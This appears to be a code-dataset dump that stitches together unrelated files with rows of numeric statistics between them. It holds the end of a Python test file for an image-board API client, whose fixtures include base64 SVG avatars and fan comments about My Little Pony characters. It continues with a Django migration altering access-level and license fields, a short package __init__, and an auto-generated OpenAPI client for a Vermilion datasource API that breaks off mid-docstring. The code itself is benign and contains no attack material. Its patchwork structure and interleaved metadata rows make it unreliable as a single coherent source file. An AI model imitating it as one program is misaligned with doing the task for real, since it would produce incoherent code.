44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzRDNkRDMiIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMu
MyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjNEI2Qjc1Ii8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjNEM2REMyIi8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM0QzZEQzIiLz48L3N2Zz4=', body='"@Azerdoe":/images/2311224#comment_8906195\r\nAJ is best pony as well. They’re awesome and [spoiler]even got together, I know it’s mostly implied but still[/spoiler]', id=8906692, created_at=datetime.datetime(2020, 4, 1, 22, 1, 57, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 1, 22, 1, 57, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Azerdoe', avatar='https://derpicdn.net/avatars/2014/07/12/00_53_04_746_02.jpg', body='"@Background Pony #F783":/images/2311224#comment_8906150\r\n[bq="Background Pony #F783"] "@Azerdoe":/images/2311224#comment_8906021\r\nLol no XD but I do think Dash deserves a best pony spot too! [/bq]\r\nHmmmm.... Well she is a best pony yes, as are the rest of them no doubt. 
But AJ is the best character in the show bar-none. If you need proof, watch Drowning In Horseshoes character review on her. It explains everything.\r\n\r\nhttps://youtu.be/kWm072ccqyw ', id=8906158, created_at=datetime.datetime(2020, 4, 1, 16, 33, 19, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=datetime.datetime(2020, 4, 1, 16, 33, 39, tzinfo=datetime.timezone.utc), updated_at=datetime.datetime(2020, 4, 1, 16, 33, 39, tzinfo=datetime.timezone.utc), user_id=296207), Comment(author='Background Pony #F783', avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiM0QjZCNzUiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzRDNkRDMiIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM
4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjNEI2Qjc1Ii8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjNEM2REMyIi8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM0QzZEQzIiLz48L3N2Zz4=', body='"@Azerdoe":/images/2311224#comment_8906021\r\nLol no XD but I do think Dash deserves a best pony spot too!', id=8906150, created_at=datetime.datetime(2020, 4, 1, 16, 29, 19, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 1, 16, 29, 19, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Background Pony #F783', 
avatar='data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiB2aWV3Qm94PSIwIDAgMTI1IDEyNSIgY2xhc3M9ImF2YXRhci1zdmciPjxyZWN0IHdpZHRoPSIxMjUiIGhlaWdodD0iMTI1IiBmaWxsPSIjYzZkZmYyIi8+PHBhdGggZD0iTTE1LjQ1NiAxMDkuMTVDMTIuMDIgOTcuODA1IDYuNDQgOTUuMDM2LS43OTQgOTguODl2MTkuMTAyYzUuMTMtMTAuMDkgMTAuMjYzLTguMjk0IDE1LjM5NS01LjciIGZpbGw9IiM0QjZCNzUiLz48cGF0aCBkPSJNNzMuMDU0IDI0LjQ2YzI1Ljg4NiAwIDM5LjE0NCAyNi4zOSAyOC45MTYgNDQuOTUgMS4yNjMuMzggNC45MjQgMi4yNzQgMy40MSA0LjgtMS41MTYgMi41MjUtNy41NzcgMTYuMjg4LTI3Ljc4IDE0Ljc3My0xLjAxIDYuNDQtLjMzIDEyLjYxMyAxLjY0MiAyMi44NTQgMS4zOSA3LjIyNC0uNjMyIDE0LjY0OC0uNjMyIDE0LjY0OHMtNDcuNzg1LjIxNi03My43NC0uMTI3Yy0xLjg4My02LjM4NyA4Ljk2NC0yNS43NiAyMC44MzMtMjQuNzQ4IDE1LjY3NCAxLjMzNCAxOS4xOTMgMS42NCAyMS41OTItMi4wMiAyLjQtMy42NjIgMC0yMy4yMzQtMy41MzUtMzAuODEtMy41MzYtNy41NzctNy44My00MC43ODUgMjkuMjk0LTQ0LjMyeiIgZmlsbD0iIzRDNkRDMiIvPjxwYXRoIGQ9Ik01Ni4xNiAyOC4wNDRjMTcuMzQ0LTEzLjIyIDU2LjI1OC0yOS4yMDUgNjMuMDYzIDMuODQ3IDIuNTIgMTIuMjQ4LjIyNSAxMy43Ni02LjE4OCAxNy45MS03Ljc5IDUuMDQ1LTE3LjM4Ni0xLjM3LTE1LjA1LTYuNjYyLTguNjUyIDcuNzA3LTE1LjQ4NCAxMC42MjQtMjMuMTIgOS44NS05LjE2Ny0uOTI3LTYuNDM3LTYuNzYtMi40MTctOS44NzIgMi40MzctMS44ODcgNS4wOC0zLjU3IDkuNDM2LTUuNzYtNy45NDIgMi41NS0xMy45OTIgMS45NzQtMTkuMjgyLTMuMzRsLTEwLjk0NyA1LjU1LjAxNSAxMS41NDJDNTMuMyA2NC4xNyA2Mi43NTggODAuODEgNjMuOTEyIDkzLjQyYy43MiA3Ljg3Ni01LjUzMiA2LjYzNy04LjY1IDEuNDI1IDEuODQ3IDUuNTgyIDMuNTkyIDkuODkyIDMuNDgzIDE1Ljg5LS4xMyA3LjE3OC04LjM4NiAxMS41NC0xMi4wNDcgMS4wOTgtNy41MDUtMjEuNDA1LTEyLjk2NS01MS45Ny0uOTczLTc1LjN6IiBmaWxsPSIjNEI2Qjc1Ii8+PHBhdGggZD0iTTQzLjI2NyAxMDcuMzI0cy02LjgyNS0xNC4xMzctNy42NC0zMC4xNjZjLS44MTctMTYuMDMtNC4xOTctMzEuNDY4LTEwLjU1LTQwLjY4OC02LjM1NC05LjIyLTEzLjI3Mi05LjczLTExLjk5Ny0zLjk4MiAxLjI3NSA1Ljc0OCAxMS4xMjMgMzMuMDE2IDEyLjEyOCAzNS45NTRDMjMuMDQyIDY1LjY0OCA3LjAzOCA0MS4xMS0uNDMgMzcuMjIyYy03LjQ3LTMuODg2LTguOTYuMzQ2LTYuODkyIDUuODg1IDIuMDY4IDUuNTQgMTguNTA3IDMwLjg0NCAyMC44ODYgMzMuNTAyLTIuNzM4LTEuNjg1LTEyLjI1Ni05LjAzNi0xNi45OTctOC45OTYtNC43NDIuMDQtNC45MSA1LjM2Ni
0yLjYxNyA4LjUyNiAyLjI5MiAzLjE2MiAyMC45MTIgMTkuMTczIDI1LjE1IDIwLjk0NS01LjM1LjI4LTEwLjM4NCAxLjk5Ni05LjE4NiA2LjAwNCAxLjIgNC4wMDYgMTEuMzg0IDE0LjA2MyAyOC41MyAxMi4zNzcgMi41NzYtMi44MzQgNC44MjMtOC4xNDMgNC44MjMtOC4xNDN6IiBmaWxsPSIjNEM2REMyIi8+PHBhdGggZD0iTTY0LjM0MiAzNS41N3MzLjI4My04LjA4LTcuMzI0LTE5LjMxOGMtMS43NjgtMS43NjgtMy4wMy0yLjI3My00LjY3Mi0uNzU4LTEuNjQgMS41MTUtMTcuMDQ2IDE2LjAzNi4yNTMgMzguMjYuNTA0LTIuNCAxLjEzNS05LjU5NyAxLjEzNS05LjU5N3oiIGZpbGw9IiM0QzZEQzIiLz48L3N2Zz4=', body='Best pony in all her glory. Oh, and Applejack is there too. \r\nHappy Birthday Ashleigh Ball!', id=8905979, created_at=datetime.datetime(2020, 4, 1, 14, 48, 11, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 1, 14, 48, 11, tzinfo=datetime.timezone.utc), user_id=None), Comment(author='Slytherin-Rui', avatar='https://derpicdn.net/avatars/2016/6/18/674933f753fa6a39ed3b7dc.jpg', body='"@UserAccount":/images/2309849#comment_8905336\r\n"Rainbow is hot and Starlight is one of the best ponies."\r\nTotally agree with you there, except for Rainbow. AJ and RD are the only ponies of the mane 6 that I don\'t find sexually appealing, while the rest are freaking hot as hell. Especially Twilight and Fluttershy.', id=8905820, created_at=datetime.datetime(2020, 4, 1, 12, 44, 33, tzinfo=datetime.timezone.utc), image_id=2309849, edit_reason=None, edited_at=datetime.datetime(2020, 4, 1, 12, 45, 3, tzinfo=datetime.timezone.utc), updated_at=datetime.datetime(2020, 4, 1, 12, 45, 3, tzinfo=datetime.timezone.utc), user_id=380341), Comment(author='Azerdoe', avatar='https://derpicdn.net/avatars/2014/07/12/00_53_04_746_02.jpg', body='Best pony in all her glory. 
Oh, and Rainbow Dash is there too.\r\nHappy Birthday Ashleigh Ball!', id=8905556, created_at=datetime.datetime(2020, 4, 1, 8, 35, 42, tzinfo=datetime.timezone.utc), image_id=2311224, edit_reason=None, edited_at=None, updated_at=datetime.datetime(2020, 4, 1, 8, 35, 42, tzinfo=datetime.timezone.utc), user_id=296207)]
self.assertEqual(cls, expected)
# end def
def test_gallery(self):
    """Gallery.from_dict should map every raw API field onto the Gallery model."""
    raw = {
        "description": "Best. Pony.",
        "id": 4810,
        "spoiler_warning": "",
        "thumbnail_id": 1484633,
        "title": "Best Pony",
        "user": "Ciaran",
        "user_id": 370912,
    }
    expected = Gallery(
        description='Best. Pony.',
        id=4810,
        spoiler_warning='',
        thumbnail_id=1484633,
        title='Best Pony',
        user='Ciaran',
        user_id=370912,
    )
    self.assertEqual(Gallery.from_dict(raw), expected)
# end def
def test_forum(self):
forum = Forum.from_dict({"description":"Discuss art of any form, and share techniques and tips","name":"Art Chat","post_count":55603,"short_name":"art","topic_count":1737})
expected = Forum(name='Art Chat', short_name='art', description='Discuss art of any form, and share techniques and tips', topic_count=1737, post_count=55603)
self.assertEqual(forum, expected)
# end def
def test_topic(self):
    """Topic.from_dict should parse an API topic payload, including the ISO timestamp.

    Fixed: the payload was wrapped in ``{'topic': ...}`` and then immediately
    unwrapped again with ``['topic']`` -- a no-op; the inner dict is now
    passed directly.
    """
    payload = {
        'author': 'dracone',
        'last_replied_to_at': '2020-03-22T20:20:02Z',
        'locked': False,
        'post_count': 3,
        'slug': 'a-lack-of-images',
        'sticky': False,
        'title': 'A lack of images',
        'user_id': 363222,
        'view_count': 0,
    }
    cls = Topic.from_dict(payload)
    expected = Topic(
        slug='a-lack-of-images',
        title='A lack of images',
        post_count=3,
        view_count=0,
        sticky=False,
        last_replied_to_at=datetime.datetime(2020, 3, 22, 20, 20, 2, tzinfo=datetime.timezone.utc),
        locked=False,
        user_id=363222,
        author='dracone',
    )
    self.assertEqual(cls, expected)
# end def
def est_cls(self):
    # NOTE(review): template stub, apparently disabled on purpose by dropping
    # the "t" so unittest's "test_*" discovery skips it: `Cls` is not defined
    # anywhere, and `{}['cls']` would raise KeyError the moment this ran.
    # Presumably a scaffold to copy when adding a new model test -- confirm
    # before deleting or renaming it back to test_cls.
    cls = Cls.from_dict({}['cls'])
    expected = Cls()
    self.assertEqual(cls, expected)
# end def
if __name__ == '__main__':
    # Allow running this test module directly (python <module>.py) in
    # addition to discovery via a test runner.
    unittest.main()
| 181.486542
| 30,765
| 0.824637
| 7,300
| 87,658
| 9.794247
| 0.14
| 0.007273
| 0.015357
| 0.021329
| 0.891661
| 0.876136
| 0.859283
| 0.837716
| 0.826806
| 0.822415
| 0
| 0.147931
| 0.088172
| 87,658
| 482
| 30,766
| 181.863071
| 0.746588
| 0.004826
| 0
| 0.184416
| 0
| 0.124675
| 0.547476
| 0.293301
| 0
| 1
| 0
| 0
| 0.176623
| 1
| 0.098701
| false
| 0
| 0.018182
| 0
| 0.132468
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
2d33f59e02c3b3ba1285f6c46055455e6bcb65d7
| 5,264
|
py
|
Python
|
daiquiri/metadata/migrations/0023_python3.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 14
|
2018-12-23T18:35:02.000Z
|
2021-12-15T04:55:12.000Z
|
daiquiri/metadata/migrations/0023_python3.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 40
|
2018-12-20T12:44:05.000Z
|
2022-03-21T11:35:20.000Z
|
daiquiri/metadata/migrations/0023_python3.py
|
agy-why/daiquiri
|
4d3e2ce51e202d5a8f1df404a0094a4e018dcb4d
|
[
"Apache-2.0"
] | 5
|
2019-05-16T08:03:35.000Z
|
2021-08-23T20:03:11.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-22 08:58
from __future__ import unicode_literals
from django.db import migrations, models
# Shared choice lists, deduplicated from the generated migration: the
# access-level list was repeated inline seven times and the license list
# twice.  Content is byte-identical to what the generator emitted.
_ACCESS_LEVEL_CHOICES = [
    ('PRIVATE', 'Private - access must be granted by group'),
    ('INTERNAL', 'Internal - logged in users can access'),
    ('PUBLIC', 'Public - anonymous visitors can access'),
]

_LICENSE_CHOICES = [
    ('CC0', 'CC0 1.0 Universal (CC0 1.0)'),
    ('PD', 'Public Domain Mark'),
    ('BY', 'Attribution 4.0 International (CC BY 4.0)'),
    ('BY_SA', 'Attribution-ShareAlike 4.0 International (CC BY-SA 4.0)'),
    ('BY_ND', 'Attribution-NoDerivatives 4.0 International (CC BY-ND 4.0)'),
    ('BY_NC', 'Attribution-NonCommercial 4.0 International (CC BY-NC 4.0)'),
    ('BY_NC_SA', 'Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)'),
    ('BY_NC_ND', 'Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)'),
]


def _access_level_field(verbose_name):
    """Build a fresh 8-char access-level CharField (fresh instance per operation)."""
    return models.CharField(choices=_ACCESS_LEVEL_CHOICES, max_length=8, verbose_name=verbose_name)


def _license_field():
    """Build a fresh optional license CharField shared by schema and table."""
    return models.CharField(blank=True, choices=_LICENSE_CHOICES, max_length=8,
                            null=True, verbose_name='License')


class Migration(migrations.Migration):
    """Re-declare choice/help-text fields so the migration state uses
    Python 3 (unicode) string literals; field definitions are unchanged."""

    dependencies = [
        ('daiquiri_metadata', '0022_table_size'),
    ]

    operations = [
        migrations.AlterField(model_name='column', name='access_level',
                              field=_access_level_field('Access level')),
        migrations.AlterField(model_name='column', name='index_for',
                              field=models.CharField(blank=True, default='', help_text='The columns which this column is an index for (e.g. for pgSphere).', max_length=256, verbose_name='Index for')),
        migrations.AlterField(model_name='column', name='metadata_access_level',
                              field=_access_level_field('Metadata access level')),
        migrations.AlterField(model_name='function', name='access_level',
                              field=_access_level_field('Access level')),
        migrations.AlterField(model_name='function', name='metadata_access_level',
                              field=_access_level_field('Metadata access level')),
        migrations.AlterField(model_name='schema', name='access_level',
                              field=_access_level_field('Access level')),
        migrations.AlterField(model_name='schema', name='license',
                              field=_license_field()),
        migrations.AlterField(model_name='schema', name='metadata_access_level',
                              field=_access_level_field('Metadata access level')),
        migrations.AlterField(model_name='table', name='access_level',
                              field=_access_level_field('Access level')),
        migrations.AlterField(model_name='table', name='license',
                              field=_license_field()),
        migrations.AlterField(model_name='table', name='metadata_access_level',
                              field=_access_level_field('Metadata access level')),
        migrations.AlterField(model_name='table', name='type',
                              field=models.CharField(choices=[('table', 'Table'), ('view', 'View')], max_length=8, verbose_name='Type of table')),
    ]
| 69.263158
| 628
| 0.640767
| 640
| 5,264
| 5.157813
| 0.151563
| 0.014541
| 0.090882
| 0.105423
| 0.891245
| 0.876098
| 0.848531
| 0.848531
| 0.838534
| 0.838534
| 0
| 0.02349
| 0.207447
| 5,264
| 75
| 629
| 70.186667
| 0.767737
| 0.013108
| 0
| 0.823529
| 1
| 0
| 0.480547
| 0.072804
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029412
| 0
| 0.073529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
77872972b56f053eef7a82c2d45f242da89b2f8c
| 129
|
py
|
Python
|
rough_surfaces/__init__.py
|
SourangshuGhosh/Damage-Mechanics
|
579a0d7ed01853f1039329b9a8e030e82d79ba97
|
[
"MIT"
] | 14
|
2016-08-04T06:49:58.000Z
|
2021-11-23T09:36:26.000Z
|
rough_surfaces/__init__.py
|
raincoder87/rough_surfaces
|
bc2f07a367f9b53e04fd2f6049f10f6b3e2d9a03
|
[
"MIT"
] | 6
|
2017-10-04T08:48:48.000Z
|
2021-11-19T23:47:41.000Z
|
rough_surfaces/__init__.py
|
raincoder87/rough_surfaces
|
bc2f07a367f9b53e04fd2f6049f10f6b3e2d9a03
|
[
"MIT"
] | 7
|
2016-08-04T06:50:10.000Z
|
2021-03-24T08:02:24.000Z
|
from . import analyse
from . import generate
from . import params
from . import contact
from . import surface
from . import plot
| 18.428571
| 22
| 0.767442
| 18
| 129
| 5.5
| 0.444444
| 0.606061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.186047
| 129
| 6
| 23
| 21.5
| 0.942857
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
77b0ff281585a4583c76a08dc7594cd0c7040b09
| 18,708
|
py
|
Python
|
code/python/Vermilion/v1/fds/sdk/Vermilion/api/datasource_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/Vermilion/v1/fds/sdk/Vermilion/api/datasource_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/Vermilion/v1/fds/sdk/Vermilion/api/datasource_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
VRS API documentation
Documentation on all available end points in the VRSAPI # noqa: E501
The version of the OpenAPI document: v1
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from fds.sdk.Vermilion.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.Vermilion.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.Vermilion.model.data_source_data import DataSourceData
from fds.sdk.Vermilion.model.data_source_data_instance import DataSourceDataInstance
from fds.sdk.Vermilion.model.data_source_list import DataSourceList
from fds.sdk.Vermilion.model.inline_response400 import InlineResponse400
from fds.sdk.Vermilion.model.inline_response401 import InlineResponse401
from fds.sdk.Vermilion.model.inline_response403 import InlineResponse403
from fds.sdk.Vermilion.model.inline_response404 import InlineResponse404
from fds.sdk.Vermilion.model.inline_response406 import InlineResponse406
class DatasourceApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Create the datasource endpoint descriptors.

    All three endpoints share auth, HTTP method (GET) and JSON headers;
    a local factory builds each `_Endpoint` with fresh (unshared) dicts
    and lists, exactly as the generated inline versions did.
    """
    if api_client is None:
        api_client = ApiClient()
    self.api_client = api_client

    def _make_endpoint(path, op_id, response_type, all_params, required,
                       types, attr_map, loc_map):
        # Fresh containers per endpoint -- nothing is shared between them.
        return _Endpoint(
            settings={
                'response_type': response_type,
                'auth': ['FactSetApiKey', 'FactSetOAuth2'],
                'endpoint_path': path,
                'operation_id': op_id,
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': list(all_params),
                'required': list(required),
                'nullable': [],
                'enum': [],
                'validation': [],
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': types,
                'attribute_map': attr_map,
                'location_map': loc_map,
                'collection_format_map': {},
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': [],
            },
            api_client=api_client,
        )

    self.v1_tenant_data_sources_data_source_code_data_get_endpoint = _make_endpoint(
        '/v1/{tenant}/data-sources/{dataSourceCode}/data',
        'v1_tenant_data_sources_data_source_code_data_get',
        ([DataSourceDataInstance],),
        ['tenant', 'data_source_code', 'entity_codes', 'entity_keys'],
        ['tenant', 'data_source_code'],
        {'tenant': (str,), 'data_source_code': (str,),
         'entity_codes': (str,), 'entity_keys': (str,)},
        {'tenant': 'tenant', 'data_source_code': 'dataSourceCode',
         'entity_codes': 'entityCodes', 'entity_keys': 'entityKeys'},
        {'tenant': 'path', 'data_source_code': 'path',
         'entity_codes': 'query', 'entity_keys': 'query'},
    )
    self.v1_tenant_data_sources_data_source_code_get_endpoint = _make_endpoint(
        '/v1/{tenant}/data-sources/{dataSourceCode}',
        'v1_tenant_data_sources_data_source_code_get',
        (DataSourceData,),
        ['tenant', 'data_source_code'],
        ['tenant', 'data_source_code'],
        {'tenant': (str,), 'data_source_code': (str,)},
        {'tenant': 'tenant', 'data_source_code': 'dataSourceCode'},
        {'tenant': 'path', 'data_source_code': 'path'},
    )
    self.v1_tenant_data_sources_get_endpoint = _make_endpoint(
        '/v1/{tenant}/data-sources',
        'v1_tenant_data_sources_get',
        (DataSourceList,),
        ['tenant', 'sort', 'pagination_limit', 'pagination_offset'],
        ['tenant'],
        {'tenant': (str,), 'sort': (str,),
         'pagination_limit': (int,), 'pagination_offset': (int,)},
        {'tenant': 'tenant', 'sort': '_sort',
         'pagination_limit': '_paginationLimit',
         'pagination_offset': '_paginationOffset'},
        {'tenant': 'path', 'sort': 'query',
         'pagination_limit': 'query', 'pagination_offset': 'query'},
    )
def v1_tenant_data_sources_data_source_code_data_get(
self,
tenant,
data_source_code,
**kwargs
):
"""Gets the data for the datasource # noqa: E501
Gets the data for the datasource. There are optional query parameters to filter the da # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_tenant_data_sources_data_source_code_data_get(tenant, data_source_code, async_req=True)
>>> result = thread.get()
Args:
